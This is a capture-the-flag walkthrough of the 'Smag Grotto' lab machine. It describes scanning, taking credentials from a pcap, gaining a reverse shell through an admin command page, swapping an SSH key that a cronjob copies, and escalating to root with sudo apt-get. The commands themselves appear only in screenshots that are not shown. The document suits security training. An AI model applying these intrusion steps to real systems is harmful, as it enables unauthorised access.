# Smag Grotto ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNr6CDrPJYdDy1cfsG%2F-MdNr9Zra4YUR6aP-42j%2Fimage.png?alt=media\&token=22bbf5f3-e754-424d-aec5-66f806bb215a) ## Scanning Lets run nmap scans to find open ports and services ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNr6CDrPJYdDy1cfsG%2F-MdNrscq3XY8fVHf_A1O%2Fimage.png?alt=media\&token=24bd7c6d-cc24-49be-b761-24d4d6db42d0) ## Enumeration Lets visit the website ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNrvagSxQZ9AP6Qe2l%2F-MdNsP4_CRofOqveFNpQ%2Fimage.png?alt=media\&token=e4b0fdff-6567-4301-8f03-a66dd724f3b0) Lets run a gobuster scan ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNtT-zTrLa7pLm7zi7%2Fimage.png?alt=media\&token=fc64282d-1804-423b-9d97-5389e732facb) Lets visit this directory ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNtdkHCT299hTXaWA5%2Fimage.png?alt=media\&token=86bcd22f-efb2-4d9c-b594-188b553353e7) Lets look at the source code ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNttCrcY5uiy0sXbxQ%2Fimage.png?alt=media\&token=60ffbb3b-cc85-474c-bb18-a508d4b96a6f) We have a email, and a link that will download a pcap file onto our machine. Lets open the file with Wireshark. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNsQZQGnVtgRT9We5m%2F-MdNufmnTOpZjFdSwl98%2Fimage.png?alt=media\&token=e3e3857b-e2d1-427a-b2c6-2050a93f81f1) Lets look at the packet details by *`Right clicking and Follow > TCP Stream`.* ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNvmSsQdjRG4S45w1F%2Fimage.png?alt=media\&token=b27cd6d5-1315-4faf-9569-438206e5c26e) Looks like we have a username and a password, we also have a host, lets add this to our `/etc/hosts` file. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNwlGFddj-5LyJJABE%2Fimage.png?alt=media\&token=458a1393-58ca-4501-be4b-7da2c33ebfad) Lets visit this site ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNx6t9lDp8tNYWsfFv%2Fimage.png?alt=media\&token=fd767dc3-8449-4f9d-aa51-ae63f9654152) Ok so we have a login page for users and a login page for admins, we have credentials for a helpdesk users, so lets login in the `admin.php` site. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNxWJ06Tb7nRyuiDK9%2Fimage.png?alt=media\&token=5e866f59-ca3d-46d9-b5a9-dcfebbdc9fe5) We are logged in. Looks like we can run commands, lets try running a reverse shell command to get a reverse shell on the machine. ## Exploitation Lets first start a netcat listener ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNyFhOQPEMGWiLcDSg%2Fimage.png?alt=media\&token=aa39c932-0068-4766-8aec-f21e8ad507a9) Now lets run the command ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNyR3ChV-rQuOd4_Ob%2Fimage.png?alt=media\&token=2aca0bc2-4d71-4077-9104-7b16801287df) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNySe1k3LEuLZ4BEaO%2Fimage.png?alt=media\&token=2b4b3be2-5e2b-442f-a3c5-0c64a869bff7) We have a reverse shell, lets stabilize the shell ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdNycnERlmcRAM2XAWE%2Fimage.png?alt=media\&token=e0f88a5c-43a6-4f49-8530-1ce1148e03ae) ## Privilege Escalation Looking around the machine, I found a interesting `cronjob` in the crontab file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO4nbn2tZqD1NXSvNM%2Fimage.png?alt=media\&token=68acc2bc-a370-4564-85e9-e88c32daa133) So the cronjob is taking Jake's backup ssh key and adding it to the authorized keys, we can create our own key and modify the backup file , then we would we get access to the ssh server with the user privileges of Jake. Lets first generate our own SSH public key ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO5d3JzxkWAaRP5brQ%2Fimage.png?alt=media\&token=a261ce2b-4fc3-4e33-b790-7d8de9312533) Lets now copy it and replace it with the backup one in the machine. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO5qOO5Y5v99reiMvx%2Fimage.png?alt=media\&token=cd77d3b9-8053-4c6a-ab79-884242523492) ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO6Ma5N65atxYePVoR%2Fimage.png?alt=media\&token=ab09765d-60eb-4b99-b77d-7a373336f761) Now lets wait for a few minutes and then login with the Jake username. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO73uBZsC2AChQOyp0%2Fimage.png?alt=media\&token=eed21b48-8a44-4ccc-ae65-22f5b4c1eab1) We can read the user flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7AK7UaFNgaZ67f2v%2Fimage.png?alt=media\&token=458a6a84-a984-4a87-acea-8f5ebd8a5861) Lets run `sudo -l` to see what we can run as other users. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7JGo060SmyHCRabE%2Fimage.png?alt=media\&token=37851735-e247-4423-8adc-56e186b1ac18) Lets go to [GTFOBins](https://gtfobins.github.io/gtfobins/apt-get/#sudo). ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7UAzVMdy8USs0Kh9%2Fimage.png?alt=media\&token=00925ed1-f57a-4ade-aaae-b7063093d8dd) Lets use the 3rd command ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7ZXjYtz-5TMe0FU2%2Fimage.png?alt=media\&token=e22300e1-7d2d-4584-8843-ad019d93a7a0) We are now root, we can read the root flag ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-MdNvhVqP5i4pixADJrx%2F-MdO7gkNEOJhoPR9u-oM%2Fimage.png?alt=media\&token=64d13135-31be-43ba-a4de-dd51b9a7ddaa)